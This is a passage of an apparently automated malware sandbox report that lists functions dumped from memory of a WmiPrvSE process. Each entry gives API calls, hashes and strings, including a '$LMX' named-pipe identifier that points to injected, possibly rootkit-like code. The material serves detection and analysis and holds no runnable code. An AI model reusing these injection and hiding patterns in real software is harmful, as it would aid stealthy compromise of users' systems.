                                                                • Opcode Fuzzy Hash: 73f99dd158d02f66700fb77c4ca87c0b903f96ca38ef138df72cf0141c470259
                                                                • Instruction Fuzzy Hash: FD117F39704E6241FB585B36AA953F93AB35F847E0F18E335677B076D6DE28C4214200
                                                                Function 000001F5A9682438 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                • String ID: \\.\pipe\$LMXchildproc
                                                                • API String ID: 166002920-4086216030
                                                                • Opcode ID: b4f5737ec96b0c9e0b320a30835d4fc4977b95f942ea24fc39ad3b6124d69255
                                                                • Instruction ID: 93f2766c167c9d500ba7f0908a4681cc9f9d984afc01ba65b53184cd3dce1a79
                                                                • Opcode Fuzzy Hash: b4f5737ec96b0c9e0b320a30835d4fc4977b95f942ea24fc39ad3b6124d69255
                                                                • Instruction Fuzzy Hash: 64115135614F5282EB108B21F5447A97771FB89BE5F505325EB6A07BA8CF7CC168CB00
                                                                Function 000001F5A9687A20 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction ID: cbd04626af794b0ee347da996cb5fec45c294747d84217c8e451300385ccd701
                                                                • Opcode Fuzzy Hash: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction Fuzzy Hash: 4B81B338600F3786FB50AB65A4913F96AB3AF85780F18F3359B1B47796DB38C9658700
                                                                Function 000001F5A96899AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689A31
                                                                • GetLastError.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689A3F
                                                                • LoadLibraryExW.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689A69
                                                                • FreeLibrary.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689AD7
                                                                • GetProcAddress.KERNEL32(?,?,?,000001F5A9689B6B,?,?,?,000001F5A968935C,?,?,?,?,000001F5A9688E65), ref: 000001F5A9689AE3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                • String ID: api-ms-
                                                                • API String ID: 2559590344-2084034818
                                                                • Opcode ID: 4b8a36a4a4a2b0dd80eede7cdc1baa3105cb8079cac949a61d2893f2abe26ef9
                                                                • Instruction ID: 6a3ee1aa0d60bfc83de5c4d68f92eea4043ec95a64bcd603de47a9d844f5d45e
                                                                • Opcode Fuzzy Hash: 4b8a36a4a4a2b0dd80eede7cdc1baa3105cb8079cac949a61d2893f2abe26ef9
                                                                • Instruction Fuzzy Hash: 8B31C239212F62A1EF519B4298007F527B6BF44BA4F59A736DE2F0B794EF38C4648300
                                                                Function 000001F5A9693954 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                • String ID: CONOUT$
                                                                • API String ID: 3230265001-3130406586
                                                                • Opcode ID: 12c2d174039e60869952cb61123dfc76bc67eb013c11dd170298cf19353e4692
                                                                • Instruction ID: 38f35608f515abd90daae69449c3644edb120b4412131012800fddb7f14dcb8e
                                                                • Opcode Fuzzy Hash: 12c2d174039e60869952cb61123dfc76bc67eb013c11dd170298cf19353e4692
                                                                • Instruction Fuzzy Hash: 42118135310F5282E7508B56F8847A976B1FB88BE8F101325EB6F8BB94DF38C8648740
                                                                Function 000001F5A9683CA4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                • String ID: wr
                                                                • API String ID: 1092925422-2678910430
                                                                • Opcode ID: 5b1397cb5b50c8101928f34d71be35eaa6444752faf99293e0902f100c4b543c
                                                                • Instruction ID: 7f018a560ba6905d482e40d185af31710443b8c7db82e2c8200b51b337a43592
                                                                • Opcode Fuzzy Hash: 5b1397cb5b50c8101928f34d71be35eaa6444752faf99293e0902f100c4b543c
                                                                • Instruction Fuzzy Hash: E7117C3A300B5282EF249B22E4496A96672FB88B94F044635DF9E0B758EF3DC5548700
                                                                Function 000001F5A9686040 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Thread$Current$Context
                                                                • String ID:
                                                                • API String ID: 1666949209-0
                                                                • Opcode ID: 19d745c72799060c9935a4a8aa146f0e2f5e42f3a6b8fedce84a208a8406b2a8
                                                                • Instruction ID: 87d3b39804df34a6b113a2c3955ae02a96b04620b3cdcff1882cf058066b23c2
                                                                • Opcode Fuzzy Hash: 19d745c72799060c9935a4a8aa146f0e2f5e42f3a6b8fedce84a208a8406b2a8
                                                                • Instruction Fuzzy Hash: 35D1AC3A204F5986DB709B06E4943AA7BB1F7C8B84F115626EBCE47BA5DF38C551CB00
                                                                Function 000001F5A96833A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID: $LMX
                                                                • API String ID: 756756679-1475574623
                                                                • Opcode ID: 9c8b55f238741d735e4a54714f017bc321d4de259bfeef26000a0906f35dcd8a
                                                                • Instruction ID: 5ad9aeee4e79bc299f7b1e7b377757f53caf3ee4a7ebe6b77ec56aa3c4f17795
                                                                • Opcode Fuzzy Hash: 9c8b55f238741d735e4a54714f017bc321d4de259bfeef26000a0906f35dcd8a
                                                                • Instruction Fuzzy Hash: B9315B3A701F6282EB52DF56A544BF96BB2BF44B84F08A2309F4A47B55EF38C4758340
                                                                Function 000001F5A968CB40 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CB4F
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CB85
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBB2
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBC3
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBD4
                                                                • SetLastError.KERNEL32(?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968CBEF
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Value$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2506987500-0
                                                                • Opcode ID: b08d9a4c7f7b46a4b2fd56df4838c4c74be0a96ae1611579e3cdb80d27ea737b
                                                                • Instruction ID: 921fdb247d33ca173ef3189cc757ad435c72e69e86d4f873f1da16f7060f765f
                                                                • Opcode Fuzzy Hash: b08d9a4c7f7b46a4b2fd56df4838c4c74be0a96ae1611579e3cdb80d27ea737b
                                                                • Instruction Fuzzy Hash: 49114D3D205EA241FB546B31A5913F93AB79F487F0F14E7359B77476DADE28C4218240
                                                                Function 000001F5A9681A30 Relevance: 9.0, APIs: 6, Instructions: 41stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                • String ID:
                                                                • API String ID: 4193868204-0
                                                                • Opcode ID: ce08c4955bc3595479c1ff8ad2ed921ed68cc80d96d97178f87881ade0f5eed0
                                                                • Instruction ID: e5e4e9e196b3f127d0e0900f12e973f87dc0ff51f9edced1c3cd9a0e60c062fe
                                                                • Opcode Fuzzy Hash: ce08c4955bc3595479c1ff8ad2ed921ed68cc80d96d97178f87881ade0f5eed0
                                                                • Instruction Fuzzy Hash: DC016D39700F5682EB10DB12E8843A966B2FB48FC0F449235DF5B47758DE3CC5568740
                                                                Function 000001F5A9683BF0 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                • String ID:
                                                                • API String ID: 449555515-0
                                                                • Opcode ID: b176ca198d829ca6e6572b04522aece1b0ceee872bb169399538571e8d92b986
                                                                • Instruction ID: 256365f260089578f26dd477e90ede022b8e12b6d71032ee4bae7724535cb890
                                                                • Opcode Fuzzy Hash: b176ca198d829ca6e6572b04522aece1b0ceee872bb169399538571e8d92b986
                                                                • Instruction Fuzzy Hash: 96015E38611F1282EF209B21F8597A572B2AF48B85F045634CB5E0B754EF3DC4688700
                                                                Function 000001F5A9681AD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FinalHandleNamePathlstrlen
                                                                • String ID: \\?\
                                                                • API String ID: 2719912262-4282027825
                                                                • Opcode ID: 774532233ec787998bc1a782b7f1ce1edbaa92c6b4f7b4f760a62182fecc30cd
                                                                • Instruction ID: 34aaecc82dc5706791dcaa84772667b25b782799659e5eb43f9e86e12d73600f
                                                                • Opcode Fuzzy Hash: 774532233ec787998bc1a782b7f1ce1edbaa92c6b4f7b4f760a62182fecc30cd
                                                                • Instruction Fuzzy Hash: 91F03176304A9792EB208F15E9C47E96776FB44BD8F84A2309B4A4B558DA3CC6ADC700
                                                                Function 000001F5A96834E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CombinePath
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3422762182-91387939
                                                                • Opcode ID: 6202b20eb02c5f1e8af5f43e3d25ad070a56f4cec26fe12a7a756910ae00a6f8
                                                                • Instruction ID: 35e41e1b5ef25fb4d4adf92ab082dd96fb76b8766f40cd96fb6f4299e571800d
                                                                • Opcode Fuzzy Hash: 6202b20eb02c5f1e8af5f43e3d25ad070a56f4cec26fe12a7a756910ae00a6f8
                                                                • Instruction Fuzzy Hash: 78F05E78204FA692EF108B12B9141A96672AF48FC0F48B230EF670BB18DF2CC4658700
                                                                Function 000001F5A968B838 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 14cb994fcb5560a12c5e1953b3fd41106fd5175fd4f0c594a9665650bc6d5d02
                                                                • Instruction ID: a60635cdf8842bc70983cf936a9d88c4fa299296faa67042d337c7af031297de
                                                                • Opcode Fuzzy Hash: 14cb994fcb5560a12c5e1953b3fd41106fd5175fd4f0c594a9665650bc6d5d02
                                                                • Instruction Fuzzy Hash: 43F04F79211F1781EF108B24A8443F96372AF457A1F542325C76B4B1E4CF2CC069C700
                                                                Function 000001F5A96855E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: 915f7334823fb09fbba155b0d0a4046490fce34ad90da33203a78074e5a9b0b4
                                                                • Instruction ID: 5deaf14c66f4429b9f93097aac6e3d493705bbd473805ca08304b1e3b57a17cc
                                                                • Opcode Fuzzy Hash: 915f7334823fb09fbba155b0d0a4046490fce34ad90da33203a78074e5a9b0b4
                                                                • Instruction Fuzzy Hash: 3E02B93A119B9586DB60CF59E4903AABBB1F7C4794F105126EB8E87BA8DF7CC454CB00
                                                                Function 000001F5A9685C20 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                • Opcode ID: c714fa1bf2486968fc03f5a7cef5c19b3b55a7fa136225422b0b18cc0235597e
                                                                • Instruction ID: 1198bd5607f74262de830f96cffb8eecadf7eedcf31d3fc2fc882eba8c82e05a
                                                                • Opcode Fuzzy Hash: c714fa1bf2486968fc03f5a7cef5c19b3b55a7fa136225422b0b18cc0235597e
                                                                • Instruction Fuzzy Hash: C361F83E118F55C6E7608F15E4943AABBB1F788784F50A265EB8E43BA4DB78C560CF00
                                                                Function 000001F5A96630A4 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                • Instruction ID: b4d1e71d77409b6acc7769b154dcc9018af716cfe20d59462776179039097754
                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                • Instruction Fuzzy Hash: E9119E7AA10EF701F76C1128E542BF961736F593B4F086738AB77072EBCF2888A54200
                                                                Function 000001F5A9693CA4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                • Instruction ID: dcf930db5a1e1279795b4be3989133860c07b0d1802809e9835261b67030a463
                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                • Instruction Fuzzy Hash: 5711C67AA50E3745F7542168E5667F51063AF68774F442735BB770F3D6CF2888764200
                                                                Function 000001F5A9657FA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: displacement map'$csm
